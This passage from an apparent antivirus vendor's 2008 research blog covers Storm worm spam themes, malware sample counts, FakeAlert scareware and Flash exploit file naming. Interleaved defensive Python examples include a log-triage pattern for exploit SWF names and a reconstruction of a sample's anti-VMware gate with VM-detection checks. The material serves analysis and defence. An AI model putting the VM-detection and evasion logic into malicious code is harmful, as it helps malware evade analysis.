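            h.update(chunk)
    return h.hexdigest()


def build_baseline(paths) -> dict:
    """Record known-good hashes; do this on a machine known to be clean."""
    return {p: sha256_file(p) for p in paths}


def verify_baseline(baseline: dict) -> dict:
    """Compare current hashes against the baseline and bucket each path."""
    report = {"ok": [], "changed": [], "missing": []}
    for path, expected in baseline.items():
        if not os.path.exists(path):
            report["missing"].append(path)
        elif sha256_file(path) == expected:
            report["ok"].append(path)
        else:
            report["changed"].append(path)
    return report


def demo() -> tuple:
    """Constructed stand-in for userinit.exe in a temp directory: baseline it,
    overwrite a few bytes in place (the effect of the malware's direct disk
    write), and verify again. Returns (report before, report after)."""
    d = tempfile.mkdtemp()
    target = os.path.join(d, "userinit.exe")
    with open(target, "wb") as f:
        f.write(b"MZ" + b"\x00" * 254)
    baseline = build_baseline([target])
    before = verify_baseline(baseline)
    with open(target, "r+b") as f:
        f.seek(128)
        f.write(b"\xcc" * 8)
    after = verify_baseline(baseline)
    return before, after
```

Run on the real system, the path list would be the OS binaries that load at logon; the baseline must be stored off the machine, and the verification run from boot media, otherwise a kernel-resident rootkit can serve the original bytes to the reader while the patched ones execute.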

McAfee customers are protected from the threat by DAT 5337.

Reference:

http://article.pchome.net/content-515951.html

http://tech.ccidnet.com/art/1099/20080709/1501723_1.html

http://www.xj.xinhuanet.com/2008-06/20/content_13599327.htm

Nuwar Back to War Games

Just when you were wondering what the Storm worm authors could come up with next after using 4th of July theme as bait for their last spam run, Nuwar has now resorted to a war theme. The authors have cleverly chosen to exploit the escalating political tensions in the Middle East between Iran and the United States over Iran’s threat to attack Israel in response to any military action on its nuclear facilities. Some of the subjects observed in today’s spam are:

The beginning of The World War III
US Army crossed Iran’s borders
US Army invaded Iran
US soldiers occupied Iran
USA attacked Iran
USA declares war on Iran
USA unleashed war on Iran
War between USA & Iran

This is not the first time Nuwar has used a war theme. Incidentally, McAfee christened the Storm worm as “Nuwar” because it used the sensational war theme “Nuclear WAR in USA!” when it first appeared. Since then the authors of Nuwar have used and re-used morbid and shocking themes religiously with every new spam run. These themes sometimes get repeated when that time of the year approaches and this one is no different. War themes have been seen in previous Storm worm campaigns dating back to Nov 2006 & Apr 2007.

Storm Worm Bait Page

Unsuspecting users who follow the link in the spammed email are directed to a Storm bait page hosting a video that purportedly shows the first minutes of the beginning of World War III. Except that clicking the video would download “iran_occupation.exe”. And in case a user wanted to know about the advertised Patriots and Veterans Programs they would end up downloading “Form.exe”.  Both files are detected as W32/Nuwar@MM with McAfee’s latest beta dats.

The Storm bait pages are currently being hosted on the following fast-flux domains.

dailydotnews[.]com
dotdailynews[.]com
morenewsonline[.]com
newsworldnow[.]com
statenewsworld[.]com

The above-mentioned domain names have been sanitized in the blog and readers are strongly advised not to attempt to visit them, as they host a cocktail of exploits that attempt to infect a visiting machine. This information is being provided for administrators to take pro-active measures and block access to the rogue domains.

The S.P.A.M Experiment Final Report

On July 1 we released the results of our S.P.A.M (Spammed Persistently All Month) Experiment, in which 50 people from around the world surfed the Web unprotected for 30 days. By taking part in the experiment, participants were given permission to go where most Internet users would not dare, in order to discover how much spam they would attract and what the effects would be. Go everywhere we have told you not to go. Click everything we told you not to click. We then studied the daily blogs and analyzed the spam itself and confirmed that spammers are as active as ever; they are increasingly using psychological tricks to lure Internet users to part with their contact details, identity information and cash. The experiment (the first of its kind) clearly shows that spam continues to evolve, utilizing more local languages and cultural nuances, as well as becoming much more targeted in a bid to avoid detection.

Our brave and bold participants were assembled from 10 countries and by the end of the 30 days they received more than 104,000 spam emails–that’s an average of 2,096 messages each, the equivalent of approximately 70 messages a day.

Many of the spam messages received were phishing emails: emails that pose as a trustworthy source to criminally acquire sensitive information such as usernames, passwords, and bank account details. Other emails carried viruses, and many allowed malware to be silently installed on the computers by persuading participants to surf unsafe web sites. A number of participants noted a decrease in their computer’s processing speed, as well as an increased number of pop-ups.

The Global ‘Spam League’:

1. United States 23233
2. Brazil 15856
3. Italy 15610
4. Mexico 12229
5. United Kingdom 11965
6. Australia 9214
7. The Netherlands 6378
8. Spain 5419
9. France 2597
10. Germany 2331

To read more about the participants experiences, go here
and make sure you download the ‘Global Spam Diaries’ as well.

The End of Exponential Malware Growth?

While reading my colleague François Paget’s recent blog about detection numbers, I noticed that something about the graph illustrating the growth of the collection maintained by AV-Test.org seemed a bit odd.

AV-Test.org total collection size by unique samples

The last few months showed a bigger total size than indicated by the forecast line, which is an exponential function. By looking more closely at the statistics of monthly growth we can see why:

AV-Test.org collection monthly growth rate by unique samples

During the last couple of months there is no longer an increase in the number of new samples added. The growth is no longer exponential but linear, averaging around 600,000 samples added each month. Looking at our own numbers of new samples, I can confirm this new linear growth.

Why is this a big deal? For years the security industry has been fighting an uphill battle–with the number of new samples increasing every month at an alarming rate. Now with constant, though still massive, growth there is some light at the end of the tunnel. If this trend keeps up, planning for future resources and technologies will become much easier and more manageable.

I’ll add one more remark about counting by “unique samples,” in which unique means the file has got a cryptographic hash different from all other files in the collection: For the time being this is one useful way of counting, but it can’t be mapped to detection numbers (François explained why) and it works today only because most new samples are Trojans. Should we see more file-infecting viruses in the future, and there are some indications they will make a comeback, this way of counting will quickly become useless.

Breaking News… NOT!

There mustn’t be much going on in the world today as the Nuwar spammers have moved from jumping on real news of natural disasters and current affairs to creating their own fictional events! This high volume spam campaign is using some wacky subjects to lure people into clicking on the links:

Subject: Britney found hanged in locker room
Subject: White House hit by lightning, catches fire
Subject: Oprah found sleeping the streets
Subject: Eiffel Tower damaged by massive earthquake
Subject: Donald Trump missing, feared kidnapped
Subject: Lastest! Obama quits presidential race

This clever social engineering technique plays on people’s inquisitiveness about news of natural disasters and celebrities. The emails also follow the simple format of some text and a link that looks fairly harmless to the uneducated user.

All the links go to a fake pornotube page hosted on legitimate sites that have been hacked. If you click on the video (that’s actually just an image) it tries to download a .exe file. This is detected as BackDoor-DNM and the spam is also currently detected with our Anti-Spam products.

So it goes without saying.. NEVER click on links in an email unless you are sure of its origin, keep your Anti-Virus software up-to-date, and if you have a website make sure it’s properly secured so you’re not hosting stuff like this.

Nuwar circulating a fake topic - Beijing earthquake

Nuwar families are known for using social engineering to trick users into downloading them. As we mentioned in the blog last month, the topic of the earthquake in China has been used by malware authors for social engineering for weeks. This time, the most recent variant of Nuwar circulates a fake topic - a Beijing earthquake (not the Sichuan earthquake!).

If users click on the fake video image, the file “beijin.exe” (W32/Nuwar@MM) is downloaded. However, users might be infected with Nuwar even if they don’t click it: this page contains an iframe link to a malicious JavaScript.

Upon accessing the above page, the obfuscated JavaScript is downloaded and run because of the injected iframe. The JavaScript exploits the RealPlayer vulnerability CVE-2008-1309 and downloads another variant of Nuwar.
McAfee VSE blocks the script and detects it as “JS/Exploit-Shell.gen”.

At the time of writing, the download file was corrupted.

and I say we are detecting between 400,000 and 10,000,000 malware!

This week in Paris, a friend asked me how the anti-virus situation was going and how we will be able to face up to the unexpected increase in malware numbers. “In a day, one of your competitors announces more than 1.7 million new detections. Its total detection jumped from 74,000 to 1,800,000! If this keeps up, the level of 2 million viruses will be overtaken rapidly”, he said. Humorously, the man I was talking to concluded: “and you [McAfee], you still detect less than 400,000 threats?”

Counting malware can be quite a tricky business. At McAfee, and with each anti-virus definitions for VirusScan, we announce how many threats we are detecting with each new DAT release. This figure, however, is a *family* count. Yesterday (June 17th, 2008), the clock said 407125.

In September 2004, with DAT release 4391, we reached 100,000 threats detected. With the 4800 release in May 2006 the number of threats detected reached 200,104. This figure doubled in two years, and the situation could be analyzed as follows:

To explain how it was possible to pass from 74,000 to 400,000 or to 1,800,000 malware, I informed my friend we had to take into consideration AV researchers “zoos” - in other words: “collections” – consisting of several million malware samples (sometimes we use the term “unique samples”) collected each day.  I explained to him we had, roughly, in our high-security servers, 10,000,000 files:

  • classified by family
  • often with a vast number of variants
  • sometimes with multiple infected files from a single malware variant (when it is parasitic or polymorphic), or when malware authors configure their threats to serve a binary-unique version with each download. In that case, some zoos contain 1 or 2 *versions* while others will have 10,000 and others still 100,000!!
  • without forgetting the terrific “miscellaneous” subfolder for files that we cannot pigeonhole

Of course, I said almost all were detected and consequently all these prediction numbers were not gospel truth. I added they were only useful to establish a long-term trend on condition that their computation complies with a single rule as time goes by.

To end my demonstration I searched for real figures. First I came upon the AV-test.org statistics. On their site, they explain that they manage 60 terabytes of testing data, including several million malware samples and clean files. They test malware on all important desktop and server platforms, including all currently supported versions of Windows, Linux, Solaris, Unix, Lotus Domino/Notes and MS Exchange. Having just received from Germany some figures summarizing their malware collection, I learned the precise size of their collection, which exceeded 11 million unique samples (11,002,741 in April 2008).

Encouraged by this number, I was fairly sure we had the same volume at McAfee, including the parasitic and polymorphic malware for which we have to keep multiple samples. I asked for confirmation and received some figures, which I entered in this other chart:

While writing this blog entry I imagined the reader's surprise: in three months (from January 31 to April 30) the collections grew by 2,880,000 samples (at McAfee) and by 1,700,000 samples (at AV-test.org), an average of roughly 760,000 new files each month across the two. This is true, and it is why we constantly work on new technologies to answer this challenge.

To conclude this blog entry, I offer the following… It demonstrates that it is possible to announce that at the end of 2007 we detected "between 357,820 (DAT 5196) and 8,600,000 pieces of malware", and to predict that at the end of 2008 we will detect "between 450,000 and 22,000,000". OK, I am joking a bit, but I also want to show that there are many ways to count malware, and that you must not judge a product only by the announced number of detections.

Scary screensavers, take two

In one of my previous blog posts I wrote about FakeAlert-AG's fear strategy, which consisted of changing the desktop background and dropping the legitimate "bugs" screensaver. In newer variants of this threat the authors have kept the same strategy, but they have changed the screensaver to one that is far more frightening to computer users…

Yes, you guessed right, the BlueScreen screensaver!!!

The bluescreen screensaver in action!

As in the previous case, the screensaver chosen by the author(s) of this threat is a legitimate application, this time from SysInternals, well known for its active contributions to the security community. The effect of a convincing fake blue screen of death is such that we are afraid it may have tricked several users.

Logging off,

Paolo

Detecting Malware With Vulnerability Scanners

A while back a customer reported a false positive on one of our Foundstone checks. The check was not even meant to detect malware; it detects the presence of a certain legitimate remote administration tool. The customer insisted they were not running that administration server on the host. From the diagnostic packet captures they sent in, however, there was no denying that the tool was running on that host, whether they knew it or not. And that tool happens to be commonly dropped by malware to serve as its backdoor. No doubt some damage had already been done by the time they reported this to us, but how much more damage was prevented because our check uncovered the breach?

Malware detection is not one of the most prominent functions of a remote vulnerability scanner, but most major scanners do offer the capability. Don't expect vulnerability scanners to replace your traditional AV any time soon, though.

Although vulnerability scanners can open and read files, they are mostly agentless, so they are reduced to making remote calls (RPC, for example) to perform these operations. If you tried to mimic the signature scanning of traditional AV this way, performance would be unacceptably poor. So malware checks have to settle for detecting the presence of malware, that is, its traces: the existence of certain files (without opening or reading them), registry keys, or a running service. In most cases, finding two out of three of these traces is a unique enough combination for a strong detection.

Another way to detect malware with a vulnerability scanner is to detect its network activity. If it opens a backdoor on a particular port and listens for commands, as the majority of malware does today, most likely we can detect it remotely. In this respect the vulnerability scanner actually has an advantage over traditional host-based AV. Take a rootkit that hides its files, registry entries, running process, service and so on: it is virtually invisible on the host. It might even hide its network activity, but only from programs running on the local machine, because the hooks it installs live in that machine's kernel and user-mode APIs. Sophisticated as the rootkit may be, it cannot hide a port that accepts connections from a vulnerability scanner probing it from another machine.

In the end, detecting malware with a vulnerability scanner is purely reactive: you raise a flag after the malware has already installed itself, whereas traditional AV has the nobler goal of keeping it off the host in the first place.

Some might consider the malware detection offering of vulnerability scanners as superfluous because of the limited capability and its reactive nature. But I’m sure that the customer with the hidden remote administration tool isn’t one of them.
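Both detection routes the post describes, as an added example that is not Foundstone's code or any real scanner's check: a two-of-three presence rule over the traces an agentless scanner can collect, and a remote banner probe against a listening port. The listener, its banner text and the signature it is matched against are constructed for the example (the remote administration tool in the story is not named, and no real product's greeting is reproduced); the trace booleans are passed in rather than gathered over RPC.

```python
import socket
import threading
from dataclasses import dataclass

# Constructed stand-in for a listening backdoor: it greets every client with a
# fixed banner. Banner text and signature are invented for this example.
FAKE_BANNER = b"remote-admin-tool v1.0 ready\r\n"

BANNER_SIGNATURES = {
    "hypothetical-remote-admin-tool": b"remote-admin-tool v1.0",
}


def start_fake_backdoor(host="127.0.0.1"):
    """Start the stand-in listener on an ephemeral port; return (socket, port)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, 0))
    srv.listen(5)
    port = srv.getsockname()[1]

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:          # listener closed: stop serving
                return
            with conn:
                conn.sendall(FAKE_BANNER)

    threading.Thread(target=serve, daemon=True).start()
    return srv, port


def grab_banner(host, port, timeout=2.0):
    """Remote probe: connect and read whatever the service volunteers.
    None means nothing accepted the connection; b"" means a silent listener."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.settimeout(timeout)
            try:
                return s.recv(256)
            except socket.timeout:
                return b""
    except OSError:
        return None


def network_verdict(host, port):
    """Classify a port from the outside, where host-local hooks cannot reach."""
    banner = grab_banner(host, port)
    if banner is None:
        return "closed"
    for name, sig in BANNER_SIGNATURES.items():
        if sig in banner:
            return name
    return "unknown-listener"


@dataclass
class HostTraces:
    """Presence-only facts an agentless scanner can collect remotely."""
    file_present: bool
    registry_key_present: bool
    service_running: bool


def trace_verdict(t):
    """The post's two-out-of-three rule for a confident presence detection."""
    return sum((t.file_present, t.registry_key_present, t.service_running)) >= 2


def assess(traces, host, port):
    """Combine both signals; either one alone is enough to raise the flag."""
    net = network_verdict(host, port)
    return {
        "traces": trace_verdict(traces),
        "network": net,
        "flag": trace_verdict(traces) or net in BANNER_SIGNATURES,
    }


if __name__ == "__main__":
    srv, port = start_fake_backdoor()
    # All three traces hidden (the rootkit case), yet the port is still visible.
    print(assess(HostTraces(False, False, False), "127.0.0.1", port))
    srv.close()
```

Run directly, it starts the stand-in listener on an ephemeral loopback port, probes it and prints a verdict in which the trace rule says "clean" but the network probe still raises the flag. That is the rootkit case from the post: nothing on the host admits to the listener, but the open port is visible from outside.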

Flash Player Exploit Update 2

Last night our researchers identified similarities between the recent Adobe Flash exploits and a known (patched) vulnerability, CVE-2007-0071. At first this appeared to close the case, but there was a report of a patched version of Flash falling victim to one of these attacks, and we have seen an SWF file referencing a missing file named WIN 9,0,124,0i.swf, which also suggests that the latest version of Flash (9,0,124,0 at the time of writing) is the target of that file.

The exploits we have captured in the field do not appear to exploit the latest version of Flash. We continue to hunt for the missing 9,0,124 exploits and will post an update should one be discovered. In the meantime, it is best to update to the latest player if you have not already done so.

You got malware… with bugs included!!

Yesterday, while analyzing a variant of a FakeAlert trojan, I saw something funny, confirmation that when analyzing malware it is rather common to stumble across interesting stuff :)

We received a file named 4nlSkgZm.exe, which of course is a really dodgy filename, but we'll pretend we didn't notice :P. When I ran the file on my goat machine it started installing itself and displaying the usual "you are infected" pop-ups, as expected, but it also decided to be even more direct in telling me I was infected:

Pretty effective way to scare victims!

What happened? Nothing too fancy: the malware replaced my existing background with a dropped image, and then set my current screensaver to "blackster.scr", which was dropped too. Interestingly, "blackster.scr" is a legitimate screensaver, and we are sure its original author never imagined that his funny creation could be used like this!

All in all a rather effective method of scaring the victims of this threat :-(

CeCOS II - Co-operation and Education is Key

I was at the APWG CeCOS II conference in Akasaka, Tokyo, Japan for the last two days. It was encouraging to see many members not only from academia, security vendors and anti-phishing groups, but also from many law enforcement agencies, including Interpol and the Kyoto Prefecture Police among others. There were also several presenters from the online gaming community.

Having such a diverse turn-out certainly helps push greater awareness of the multitude of cyber crime issues. It was very encouraging to see everyone agreeing on better co-operation in shutting down rogue sites, tracking the bad guys and protecting users. There was also a video crew from NHK, to bring the CeCOS message to Japanese TV viewers.

Dr. Uchida-san from the Institute of Information Security and Steve Sheng from Carnegie Mellon University (CMU) also presented a different angle on the issue, from the psychological and educational aspects, both of which complement the policy and technology countermeasures.

Shinsuke Honjo and I gave a presentation on Monday to highlight how malware authors are now going all out to attack victims from all cultures. They can craft spam, phishing sites or malware to target diverse cultures and groups of Internet users in the Asia Pacific region. It was interesting to have our research corroborated by data from other speakers at the event. Terence Park, a researcher from KrCERT/CC, in particular demonstrated how a Korean document viewer was used as bait to install a password stealer. This was another classic example of how malware authors use localized techniques to reach their victims.

Overall, the message that was consistent throughout was co-operation and education. In tackling a global issue like cyber crime, both are important factors, not only in tracking and prosecuting the criminals but also in better protecting Internet businesses and users.

Flash Player Exploit Update

Here's a quick update to the earlier post on a new unpatched Adobe Flash vulnerability. While looking for sites serving these SWF exploits we have found a connection with the recent mass hacks. Hacked sites reference an external script, just as they have for quite some time, but the external scripts now reference an SWF file. That SWF file in turn references another SWF file named WIN%209,0,124,0i.swf (WIN 9,0,124,0i.swf), which seems to be off-line. While we cannot confirm that this last SWF file attempts to exploit the new vulnerability, Symantec earlier mentioned the same domain serving the exploit. SANS also mentions another domain and two presumed exploits, named WIN%206,0,79,0ff.swf (WIN 6,0,79,0ff.swf) and WIN%206,0,79,0ie.swf (WIN 6,0,79,0ie.swf), also off-line. These file names suggest three things:

1) Different exploits are crafted for different versions of Adobe Flash, in this case 9,0,124,0 and 6,0,79,0. The names follow the format of the version string the Flash player reports to scripts (platform tag, then four comma-separated numbers), which is presumably how the serving script picks which file to hand out.
2) Versions of the exploit may also exist, or be under development, for other operating systems, since the file names begin with WIN.
3) Exploits exist for both Internet Explorer and Firefox, as the file names end in "i", "ie" or "ff".
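The naming scheme spelled out in the three points above (and the WIN 9,0,124,0i.swf reference in the "Update 2" post earlier in this archive) is easy to turn into a triage check for web proxy logs. The following is an added example, not code from the post or from Avert Labs: the log lines are constructed, the domain is a reserved .invalid name, and mapping the bare "i" suffix to Internet Explorer is an assumption, since the post only says the suffixes are "i", "ie" or "ff".

```python
import re
from collections import Counter
from urllib.parse import unquote, urlsplit

# File name pattern the post documents: "<PLATFORM> <a>,<b>,<c>,<d><suffix>.swf",
# served URL-encoded (the space arrives as %20). The suffix tags the browser.
NAME_RE = re.compile(
    r"^(?P<platform>[A-Z]+) (?P<version>\d+,\d+,\d+,\d+)(?P<suffix>[a-z]*)\.swf$"
)

# Suffix meanings as the post reads them. Treating the bare "i" as Internet
# Explorer is an assumption made for this example.
SUFFIX_BROWSER = {"i": "Internet Explorer", "ie": "Internet Explorer", "ff": "Firefox"}


def parse_exploit_name(url):
    """Return platform/version/browser for a URL whose file name matches the
    scheme, or None for anything else."""
    name = unquote(urlsplit(url).path.rsplit("/", 1)[-1])
    m = NAME_RE.match(name)
    if not m:
        return None
    return {
        "platform": m["platform"],
        "version": m["version"].replace(",", "."),
        "browser": SUFFIX_BROWSER.get(m["suffix"], "unknown"),
    }


# Constructed proxy log lines (not from the post): time, client, method, URL.
SAMPLE_LOG = """\
2008-05-28T10:01:02 10.0.0.5 GET http://example-evil.invalid/WIN%209,0,124,0i.swf
2008-05-28T10:01:09 10.0.0.7 GET http://example-evil.invalid/WIN%206,0,79,0ff.swf
2008-05-28T10:02:11 10.0.0.9 GET http://example-evil.invalid/WIN%206,0,79,0ie.swf
2008-05-28T10:03:30 10.0.0.5 GET http://www.example.com/index.html
2008-05-28T10:04:44 10.0.0.8 GET http://example-evil.invalid/s.js
"""


def triage(log_text):
    """Pull every request for a version-tagged SWF out of the log, keeping the
    client address so exposed machines can be followed up."""
    hits = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) < 4:
            continue
        info = parse_exploit_name(parts[3])
        if info:
            info["client"] = parts[1]
            hits.append(info)
    return hits


def summarize(hits):
    """Count hits per (targeted Flash version, browser) pair."""
    return Counter((h["version"], h["browser"]) for h in hits)


if __name__ == "__main__":
    found = triage(SAMPLE_LOG)
    for h in found:
        print(h)
    print(summarize(found))
```

summarize() groups hits by targeted version and browser, which is what you want when deciding which client population is exposed and whether the 9,0,124,0 file the post is hunting for has actually been requested from your network.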

Thus far we have identified two particular domains involved in mass hacks that are also believed to have served these Flash exploits. Combined, Google yields approximately 250,000 page results when searching for those references (i.e. compromised sites that link to scripts that link to Flash exploits).

Again this threat is still under analysis, more details to follow.

The Strange Case of ‘Mr. Spilberg’

When analyzing malware, it is not uncommon to stumble across interesting situations. Recently, I have been analyzing a variant of a FakeAlert BHO. This threat isn’t notable; it displays “alert” pop-ups when correctly installed, and prompts users to download a fake anti-spyware product.

However, when analyzing it, I noticed that this BHO was trying to access a file named “f***youspilberg.bat” located in the root folder of my research machine. Of course, with such a name, I immediately got interested and started to dig deeper to see what was going on.

After removing the inevitable compression layer, I was quickly able to locate the file access operation inside the FakeAlert's code; specifically, it resides inside the DllRegisterServer export, the function regsvr32 calls to register a COM server such as a BHO when it is installed.

Locating the access to the f***youspilberg.bat file

After analyzing the code, I saw that the routine which contains the file access operation will perform checks on the existence of this file and the file creation date, returning TRUE if the checks are OK or FALSE otherwise. This again increased my curiosity. :)

So, I resumed analyzing the code that follows the invocation of the routine which performs the check on the f***youspilberg.bat file:

If the file checks are successful, we'll skip the next basic block

We can see now that if the checks on the file are successful, the next block of code is bypassed. What is that block, and why would we want to bypass it? After looking further, I found that it just checks for the presence of VMware. If VMware is detected, nothing else happens and the FakeAlert silently exits.

Gluing this all together, the code becomes:

Now everything is clear!

Now we have all the pieces. If the f***youspilberg.bat file is found, the anti-VMware check is skipped. Otherwise, the sample verifies that it is not running inside a VMware box. The VMware check is there to prevent analysis in a safe environment, but why bypass such a check if f***youspilberg.bat is present?

We can only guess. It is probable that the authors of this FakeAlert needed to test their creation and decided to use VMware for that. By placing f***youspilberg.bat in the root of their VMware image, they could test without being blocked by their own protection mechanism. The flip side for analysts is that the same marker file, dropped in the root of an analysis VM (with a creation date the routine accepts), switches the check off for us too.
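The gate reconstructed above, as an added example in Python rather than the sample's native code: a marker file in a root folder short-circuits the VM check; otherwise the sample bails out when it thinks it is inside VMware. The marker name, the creation-date cutoff and the VMware artefacts checked are all assumptions. The post gives the real file name but not the date it is compared against, nor how this particular sample detects VMware, so the artefact checks here are generic well-known ones, not a reconstruction of the sample's.

```python
import sys
import uuid
from pathlib import Path

# Hypothetical marker name standing in for the one the post describes; the
# real sample looked in the root folder of the machine it ran on.
MARKER_NAME = "analyst_marker.bat"

# Assumption: the post says the sample also checked the file's creation date
# but not what it compared against, so this cutoff is invented.
MARKER_MIN_CTIME = 1199145600  # 2008-01-01T00:00:00Z

# MAC address OUIs registered to VMware.
VMWARE_OUIS = ("00:05:69", "00:0c:29", "00:1c:14", "00:50:56")


def marker_present(root):
    """Stage 1 of the gate: the 'skip the VM check' marker with an acceptable date."""
    try:
        st = (Path(root) / MARKER_NAME).stat()
    except OSError:
        return False
    # st_ctime is the creation time on Windows; elsewhere it is the inode
    # change time, the closest portable stand-in.
    return st.st_ctime >= MARKER_MIN_CTIME


def looks_like_vmware():
    """Stage 2: a few well-known VMware artefacts. The post does not say which
    check this sample used, so these are generic ones, not a reconstruction."""
    # Linux: product name the kernel exports from the DMI/SMBIOS tables
    try:
        if "VMware" in Path("/sys/class/dmi/id/product_name").read_text(errors="ignore"):
            return True
    except OSError:
        pass
    # Windows: the disk enumeration key names the (virtual) disk vendor
    if sys.platform == "win32":
        import winreg
        try:
            key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE,
                                 r"SYSTEM\CurrentControlSet\Services\Disk\Enum")
            i = 0
            while True:  # EnumValue raises OSError once the values run out
                _, value, _ = winreg.EnumValue(key, i)
                if isinstance(value, str) and "VMware" in value:
                    return True
                i += 1
        except OSError:
            pass
    # Any platform: the primary MAC address carries a VMware OUI
    mac = "%012x" % uuid.getnode()
    oui = ":".join(mac[i:i + 2] for i in (0, 2, 4))
    return oui in VMWARE_OUIS


def should_run(root, vm_check=looks_like_vmware):
    """The control flow the post reconstructs: marker present -> skip the VM
    check and run; otherwise run only when no VM is detected."""
    if marker_present(root):
        return True
    return not vm_check()


def plant_marker(root):
    """What the authors (and an analyst) would do: drop the marker in the root."""
    p = Path(root) / MARKER_NAME
    p.write_text("rem marker\r\n")
    return p


def demo():
    """Run the gate with and without the marker in a scratch directory,
    forcing the VM check to report 'VMware' so only the marker matters."""
    import tempfile
    root = tempfile.mkdtemp()
    without = should_run(root, vm_check=lambda: True)
    plant_marker(root)
    with_marker = should_run(root, vm_check=lambda: True)
    return {"without_marker": without, "with_marker": with_marker}


if __name__ == "__main__":
    print(demo())
    print("this machine looks like VMware:", looks_like_vmware())
```

The vm_check parameter exists so the decision logic can be exercised independently of the machine it runs on; in demo() the VM check is forced to "detected", which is exactly the situation the marker was built to override.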

But the real question is, What did “Mr. Spilberg” do to the authors of this malware to arouse such antagonism? Maybe they don’t like the return of Indiana Jones? Or are they scared of E.T.? :D

Abusing Our Sympathies: Sichuan Earthquake Trojan